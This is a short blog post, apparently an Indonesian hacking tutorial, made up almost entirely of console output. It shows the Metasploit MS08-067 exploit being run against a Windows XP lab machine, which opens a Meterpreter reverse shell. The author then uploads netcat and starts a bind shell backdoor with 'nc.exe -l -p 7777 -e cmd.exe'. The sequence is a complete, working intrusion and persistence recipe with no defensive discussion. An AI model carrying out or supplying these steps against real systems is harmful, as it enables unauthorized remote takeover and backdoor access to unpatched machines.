Tuesday, January 31, 2012

Metasploit dengan Netcat


msf > use  exploit/windows/smb/ms08_067_netapi 
                               set PAYLOADS winodws/meterpreter/reverse_tcp
PAYLOADS => winodws/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.56.2
RHOST => 192.168.56.2
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.2     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:1038) at 2011-07-03 00:45:42 +0700


meterpreter > upload /root/Desktop/nc.exe c:\\
[*] uploading  : /root/Desktop/nc.exe -> c:\
[*] uploaded   : /root/Desktop/nc.exe -> c:\\nc.exe
meterpreter > shell
Process 576 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>cls
cls


C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 78F1-F486

 Directory of C:\

06/26/2011  12:49 AM                 0 AUTOEXEC.BAT
06/26/2011  12:49 AM                 0 CONFIG.SYS
06/26/2011  05:45 PM    <DIR>          Documents and Settings
07/03/2011  01:19 AM            59,392 nc.exe
06/26/2011  01:01 AM    <DIR>          Program Files
06/29/2011  03:31 AM    <DIR>          rain
06/29/2011  03:33 AM    <DIR>          uun
06/29/2011  12:49 AM    <DIR>          WINDOWS
               3 File(s)         59,392 bytes
               5 Dir(s)   3,695,656,960 bytes free

C:\>nc.exe
nc.exe
Cmd line:
no port[s] to connect to

C:\>nc.exe -l -p 7777 -e cmd.exe
nc.exe -l -p 7777 -e cmd.exe

[root@Novemberain][~]
[#] nc 192.168.56.2 7777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

C:\>netstat -an
netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.56.2:139       0.0.0.0:0              LISTENING
  TCP    192.168.56.2:1034      192.168.56.1:4444      CLOSE_WAIT
  TCP    192.168.56.2:7777      192.168.56.1:47816     ESTABLISHED


No comments:

Post a Comment